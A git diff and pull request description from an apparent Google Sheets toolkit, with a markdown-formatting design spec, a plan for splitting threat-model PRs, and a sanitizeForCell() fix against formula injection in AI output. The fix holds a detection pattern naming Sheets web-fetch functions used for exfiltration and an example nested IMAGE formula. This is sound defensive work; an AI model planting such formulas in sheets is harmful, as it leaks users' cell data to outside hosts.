+  -H "Authorization: Bearer $GH_TOKEN" \
+  -H "Content-Type: application/json" \
+  https://api.github.com/repos/propublica/gas-ssi-toolkit/pulls/110 \
+  -d @"$TMPDIR/pr110_body.json" \
+  | python3 -c "import sys,json; d=json.load(sys.stdin); print(d.get('html_url') or d)"
+```
+
+Expected: prints `https://github.com/propublica/gas-ssi-toolkit/pull/110`
+
+- [ ] **Step 7: Return to develop**
+
+```bash
+git checkout develop
+```
+
+- [ ] **Step 8: Confirm PR #110 on GitHub**
+
+Open `https://github.com/propublica/gas-ssi-toolkit/pull/110` and verify:
+- New commit visible in the commit list
+- Description includes the T6 Resolved bullet with both links
+- Threat model preview (Files changed tab) shows the new PR column and Resolved T6 row

--- a/docs/superpowers/specs/2026-06-23-format-markdown-design.md
+++ b/docs/superpowers/specs/2026-06-23-format-markdown-design.md
@@ -1,0 +1,179 @@
+# Format Markdown — Design Spec
+
+| Field | Value |
+|---|---|
+| Feature | Format Markdown — in-place markdown → Sheets rich text |
+| Author | Aaron Brezel |
+| Date | 2026-06-23 |
+| Status | Draft |
+
+---
+
+## Overview
+
+A new SSI Toolkit menu item that converts markdown syntax in a user-selected cell range into Google Sheets rich text (bold, italic, strikethrough, inline code, hyperlinks, multi-level headings, bullets). Formatting is applied in-place — the cell text is stripped of markdown syntax and styled using `setRichTextValue()`.
+
+This extends the existing `parseMarkdown` + `toCellValue` pipeline that already powers the Run AI output path. No new sidebar panel; the user selects a range, clicks the menu item, done.
+
+---
+
+## Motivation
+
+`parseMarkdown()` in `rich-text.ts` already handles the core markdown subset for AI output. Journalists who type or paste markdown into cells manually (from a CMS export, notes, etc.) currently have no way to apply that formatting without running an AI job. This feature makes the parser available as a standalone formatting action.
+
+---
+
+## What Is and Is Not Supported
+
+Google Sheets `newTextStyle()` supports per-character: bold, italic, strikethrough, font family, font size, foreground color, underline, and link URL. This feature uses a subset of those.
+
+**Supported markdown → Sheets mapping:**
+
+| Markdown syntax | Sheets rendering | Notes |
+|---|---|---|
+| `**text**` | Bold | Existing |
+| `*text*` | Italic | Existing |
+| `[text](url)` | Hyperlink | Existing |
+| `* item` / `- item` | `• item` prefix | Existing |
+| `# Heading` | Bold, fontSize 18 | h1 — extended |
+| `## Heading` | Bold, fontSize 16 | h2 — extended |
+| `### Heading` | Bold, fontSize 14 | h3 — extended |
+| `#### Heading` and deeper | Bold only | h4–h6 — existing behavior |
+| `~~text~~` | Strikethrough | New |
+| `` `code` `` | Courier New font family | New |
+
+**Not supported** (no meaningful Sheets equivalent): tables, horizontal rules (`---`), numbered lists (no list-level concept in Sheets — the `1.` prefix is preserved as plain text), fenced code blocks.
+
+---
+
+## Architecture
+
+### Principle
+
+Reuse the existing `CellContent` / `TextRange` / `parseMarkdown` / `toCellValue` pipeline. Changes are additive — no existing behavior changes for the Run AI path.
+
+### Data flow
+
+```
+User selects range → "📐 SSI Toolkit > 📝 Format Markdown" menu item
+  → formatMarkdownSelection() [index.ts]
+    → getActiveRange() / validate selection
+    → for each non-empty cell:
+        parseMarkdown(cell.getValue()) [rich-text.ts] → CellContent
+        toCellValue(content) [index.ts] → RichTextValue
+        cell.setRichTextValue(richTextValue)
+    → ui.alert() with result count
+```
+
+### Code smell: TextRange ↔ toCellValue coupling
+
+`TextRange` (data model, in `rich-text.ts`) and `toCellValue` (renderer, in `index.ts`) are semantically coupled: adding a style field requires touching both. The split is intentional — `rich-text.ts` is GAS-free for testability; `toCellValue` uses `SpreadsheetApp`. This is an acceptable tradeoff at current scale. Mitigation: `toCellValue` destructures all `TextRange` fields explicitly, making the full contract visible in one place.
+
+---
+
+## File Changes
+
+### 1. `src/server/rich-text.ts`
+
+**`TextRange` interface** — add three optional fields:
+
+```typescript
+export interface TextRange {
+  startIndex: number;
+  endIndex: number;
+  bold?: boolean;
+  italic?: boolean;
+  strikethrough?: boolean;   // new
+  fontFamily?: string;       // new — "Courier New" for inline code
+  fontSize?: number;         // new — 18/16/14 for h1/h2/h3
+  url?: string;
+}
+```
+
+**`parseMarkdown()`** — change from private to exported. Extend with three new patterns (processed before plain-character fallback):
+
+- `~~text~~` → `{ strikethrough: true }` range. Must be checked before `*` patterns to avoid misparse of `~`.
+- `` `code` `` → single-backtick span → `{ fontFamily: "Courier New" }` range.
+- Heading match already extracts `#` count (`headingMatch[1].length`). Map depth to `fontSize`: 1→18, 2→16, 3→14, 4+→undefined (bold only, existing behavior). Heading range gains `fontSize` alongside `bold`.
+
+No changes to `processInline` — strikethrough and inline code are block-level only (not nested inside inline spans in the first implementation; can be revisited).
+
+**`buildRichInferenceCellContent`** and **`buildRichGroundingCellContent`** — unchanged. They call `parseMarkdown` internally; the new fields flow through automatically. The Run AI path gains the new features for free.
+
+### 2. `src/server/index.ts`
+
+**`toCellValue()`** — destructure all `TextRange` fields explicitly and extend the style builder:
+
+```typescript
+function toCellValue(content: CellContent): GoogleAppsScript.Spreadsheet.RichTextValue {
+  const builder = SpreadsheetApp.newRichTextValue().setText(content.text);
+  content.ranges.forEach(({ startIndex, endIndex, bold, italic, strikethrough, fontFamily, fontSize, url }) => {
+    if (bold || italic || strikethrough || fontFamily || fontSize) {
+      const style = SpreadsheetApp.newTextStyle();
+      if (bold)        style.setBold(true);
+      if (italic)      style.setItalic(true);
+      if (strikethrough) style.setStrikethrough(true);
+      if (fontFamily)  style.setFontFamily(fontFamily);
+      if (fontSize)    style.setFontSize(fontSize);
+      builder.setTextStyle(startIndex, endIndex, style.build());
+    }
+    if (url) builder.setLinkUrl(startIndex, endIndex, url);
+  });
+  return builder.build();
+}
+```
+
+**`formatMarkdownSelection()`** — new exported function:
+
+- Get active spreadsheet, sheet, range via `SpreadsheetApp.getActiveRange()`.
+- If no range selected, call `ui.alert("Select one or more cells first.")` and return.
+- Iterate all cells in the range. Skip cells where `getValue()` returns a non-string or empty string.
+- For each qualifying cell: `parseMarkdown(value)` → `toCellValue(content)` → `cell.setRichTextValue(richText)`.
+- After the loop, `ui.alert(\`Formatted ${count} cell(s).\`)` (skip if count is 0).
+- Wrap in try/catch; on error show `ui.alert(\`Error: ${e.message}\`)`.
+
+**`onOpen()`** — add menu item:
+
+```typescript
+SpreadsheetApp.getUi()
+  .createMenu("📐 SSI Toolkit")
+  .addItem("📐 Open SSI Toolkit", "showSidebar")
+  .addItem("📝 Format Markdown", "formatMarkdownSelection")
+  .addToUi();
+```
+
+### 3. `rollup.config.js`
+
+Add one footer stub alongside the existing ones:
+
+```js
+function formatMarkdownSelection() { _GASEntry.formatMarkdownSelection(); }
+```
+
+---
+
+## Error Handling
+
+| Condition | Behavior |
+|---|---|
+| No active range | `ui.alert()` — "Select one or more cells first." |
+| All selected cells empty or non-string | Silent skip; alert shows "Formatted 0 cell(s)." |
+| `setRichTextValue` throws on a cell | Caught per-cell; falls back to `setValue(parsedText)` (plain text, markdown stripped) |
+| Unexpected top-level error | `ui.alert()` with error message |
+
+---
+
+## Testing
+
+`parseMarkdown` is already tested in `__tests__/rich-text.test.ts`. The new features (strikethrough, inline code, h1–h3 sizing) get new test cases there — input markdown string, assert `CellContent.text` and `ranges`.
+
+`toCellValue` and `formatMarkdownSelection` are GAS-coupled and are not unit-tested (same exclusion as the rest of `index.ts`).
+
+---
+
+## Non-Goals
+
+- No undo support (Apps Script has no undo API).
+- No preview before applying.
+- No output-column mode — if needed later, it's a `RunConfig`-style extension.
+- Strikethrough and inline code are not supported inside inline spans (e.g. bold+code nesting). Can be added to `processInline` in a follow-up.

--- a/docs/superpowers/specs/2026-06-24-threat-model-pr-split-design.md
+++ b/docs/superpowers/specs/2026-06-24-threat-model-pr-split-design.md
@@ -1,0 +1,139 @@
+# Design: Split Threat Model PRs — Standalone Security Fix + PR Link Column
+
+**Date:** 2026-06-24
+**Status:** Approved
+
+## Problem
+
+PR #112 (`AI-56-address-ai-generated-import-sheets-functions`) currently branches from `cadcf0b`, the first commit of PR #110 (`AI-8-initial-threat-model`). This creates a merge order dependency: #112 cannot merge until #110 merges first.
+
+The code fix in #112 (`sanitizeForCell()`) is entirely independent — it only touches `utils.ts`, `index.ts`, and tests, none of which are introduced by AI-8. The entanglement is purely accidental from the original branching point.
+
+Additionally, the threat model's Open Items table only links to Linear issues. Fixes that land as GitHub PRs (like T6) need a way to link the PR directly so reviewers can jump to the diff.
+
+## Goal
+
+1. PR #112 becomes a standalone security fix that can merge off `develop` with no dependency on #110.
+2. The T6 "Resolved" entry (currently in #112) moves to #110.
+3. The threat model Open Items table gains a `PR` column alongside the existing `Linear` column.
+
+## Current Branch Structure
+
+```
+develop
+├── AI-8-initial-threat-model  (PR #110)
+│   commits: cadcf0b, 8315dab, 3ca908b, 7b46aaf, 7890f86
+│   files: threat model doc, PR template, CLAUDE.md, spec
+│   T6 status in threat model: Open
+│
+└── AI-56-address-ai-generated-import-sheets-functions  (PR #112)
+    branches from: cadcf0b  (first AI-8 commit)
+    commits: cadcf0b, 0edd70a
+    0edd70a touches: utils.ts, index.ts, __tests__/utils.test.ts, threat model doc
+    T6 status in threat model: Resolved (Linear link only)
+```
+
+## Target State
+
+```
+develop
+├── AI-8-initial-threat-model  (PR #110)
+│   same 5 commits + new commit:
+│     - threat model: T6 row → Resolved, Linear + PR columns populated
+│     - PR description updated
+│
+└── AI-56-address-ai-generated-import-sheets-functions  (PR #112)
+    rebased onto develop (force-push)
+    single commit: code-only cherry-pick of 0edd70a
+      (utils.ts, index.ts, __tests__/utils.test.ts — no threat model)
+    PR description updated (remove merge order note + T6 doc bullet)
+```
+
+## Part 1 — Rework PR #112
+
+### Git operations
+
+1. Checkout develop, create scratch branch:
+   ```bash
+   git checkout develop
+   git checkout -b AI-56-standalone-scratch
+   ```
+
+2. Cherry-pick the fix commit:
+   ```bash
+   git cherry-pick 0edd70a
+   ```
+   This will conflict on `docs/threat_models/ssi-toolkit-threat-model.md` (file doesn't exist on develop).
+
+3. Resolve by dropping the threat model change:
+   ```bash
+   git checkout HEAD -- docs/threat_models/ssi-toolkit-threat-model.md
+   git cherry-pick --continue
+   ```
+   (If cherry-pick auto-completes without conflict, use `git reset HEAD docs/threat_models/...` + `git checkout -- docs/threat_models/...` + `git commit --amend` instead.)
+
+4. Verify the diff contains exactly three files: `utils.ts`, `index.ts`, `__tests__/utils.test.ts`. No threat model changes.
+
+5. Force-push to the AI-56 remote branch:
+   ```bash
+   git push origin AI-56-standalone-scratch:AI-56-address-ai-generated-import-sheets-functions --force
+   ```
+
+6. Delete scratch branch: `git branch -d AI-56-standalone-scratch`
+
+### PR #112 description update
+
+Remove from the body:
+- The bullet "Marks T6 as Resolved in the threat model open items table with a link to this issue"
+- The "Merge order" note under the body
+
+The remaining bullets cover the full fix: `sanitizeForCell()` implementation, formula-prefix handling, and wiring into setValue calls.
+
+## Part 2 — Update PR #110
+
+### Threat model table changes
+
+**Current header:**
+```
+| Priority | Status | Linear | Item | Description |
+```
+
+**New header:**
+```
+| Priority | Status | Linear | PR | Item | Description |
+```
+
+All existing rows get `—` in the new PR column.
+
+**T6 row — current (on AI-8 branch):**
+```
+| High | Open | — | Fix T6 — formula injection | Implement `sanitizeForCell()`... |
+```
+
+**T6 row — updated:**
+```
+| High | Resolved | [AI-56](https://linear.app/propublica/issue/AI-56/address-ai-generated-import-sheets-functions) | [#112](https://github.com/propublica/gas-ssi-toolkit/pull/112) | Fix T6 — formula injection | `sanitizeForCell()` in `src/server/utils.ts`... |
+```
+
+### Commit on AI-8 branch
+
+Checkout `AI-8-initial-threat-model`, edit the threat model file with the changes above, then commit:
+
+```
+docs(security): mark T6 resolved, add PR column to open items table
+```
+
+### PR #110 description update
+
+Add a bullet to the Summary section:
+- "Marks T6 (formula injection) as Resolved in the open items table, referencing both the Linear issue ([AI-56](https://linear.app/propublica/issue/AI-56/address-ai-generated-import-sheets-functions)) and the fix PR (#112)"
+
+## Merge Order After This Work
+
+Either PR can merge independently. The natural order is #112 first (code fix lands in develop), then #110 (threat model lands and already reflects the resolved state). But the order is not enforced — they don't conflict.
+
+## Out of Scope
+
+- No changes to the sanitizeForCell implementation or tests.
+- No changes to other Open Items rows.
+- No other threat model sections modified beyond the Open Items table header and T6 row.

--- a/src/server/index.ts
+++ b/src/server/index.ts
@@ -36,6 +36,7 @@ import {
   interpolateTemplate,
   flattenArg,
   markAIOutputRange,
+  sanitizeForCell,
 } from "./utils";
 import { CONFIG } from "./config";
 import type {
@@ -503,10 +504,10 @@ export function runBatchAI(config: RunConfig, jobId?: string): void {
           .getRange(realRowIndex, outputIdx + 1)
           .setRichTextValue(toCellValue(buildRichInferenceCellContent(result)));
       } catch (_e) {
-        sheet.getRange(realRowIndex, outputIdx + 1).setValue(result.text);
+        sheet.getRange(realRowIndex, outputIdx + 1).setValue(sanitizeForCell(result.text));
       }
     } else {
-      sheet.getRange(realRowIndex, outputIdx + 1).setValue(result.text);
+      sheet.getRange(realRowIndex, outputIdx + 1).setValue(sanitizeForCell(result.text));
     }
 
     if (config.includeGrounding && groundingIdx >= 0) {

--- a/src/server/utils.ts
+++ b/src/server/utils.ts
@@ -195,3 +195,27 @@ export function markAIOutputRange(
   );
   sheet.getRange(startRow, colIdx, numRows, 1).setBackground("#FFF8E1");
 }
+
+// Sheets functions that make outbound HTTP requests — the exfiltration vector for formula injection.
+// We scan the whole formula body so nested calls like =IF(1=1,IMAGE("evil"),0) are caught too.
+const WEB_FETCH_PATTERN = /\b(image|importdata|importxml|importhtml|importrange|importfeed)\s*\(/i;
+
+/**
+ * Prevent formula injection when writing AI-generated text to a Sheets cell.
+ *
+ * Sheets evaluates values beginning with =, +, or - as formulas. If the formula
+ * contains a web-fetch function (IMAGE, IMPORTDATA, IMPORTXML, IMPORTHTML, IMPORTRANGE,
+ * IMPORTFEED) — anywhere in the formula, including nested positions — it could make an
+ * outbound HTTP request that exfiltrates adjacent cell data. Those values are rejected
+ * with an explicit error string.
+ *
+ * Other formula-prefixed values (=SUM, -IF, etc.) are safe to prefix with ' so Sheets
+ * treats them as literal text instead of evaluating them.
+ */
+export function sanitizeForCell(value: string): string {
+  if (!value.length || !/^[=+-]/.test(value[0])) return value;
+  if (WEB_FETCH_PATTERN.test(value)) {
+    return "[SSI Error: AI response contained an external request formula — output rejected]";
+  }
+  return `'${value}`;
+}


### PR DESCRIPTION
## Summary

- Implements `sanitizeForCell()` in `src/server/utils.ts` — scans AI-generated text for Sheets web-fetch functions (IMAGE, IMPORTDATA, IMPORTXML, IMPORTHTML, IMPORTRANGE, IMPORTFEED) anywhere in the formula body, including nested positions like `=IF(1=1,IMAGE(...),0)`, and replaces them with an explicit error string rather than writing to the sheet
- Other formula-prefixed values (`=`, `+`, `-`) that don't contain web-fetch functions get a `'` prefix so Sheets renders them as literals
- Wires `sanitizeForCell()` into both `setValue()` call sites on the AI output column in `index.ts`

## Manual QA

> N/A — targets `develop`; behaviour only changes when AI returns a value starting with `=`, `+`, or `-`

## Security

- [x] Modifies how AI output is written to the spreadsheet (affects T6 — formula injection)

## Notes

<\!-- Anything reviewers or QA testers should know -->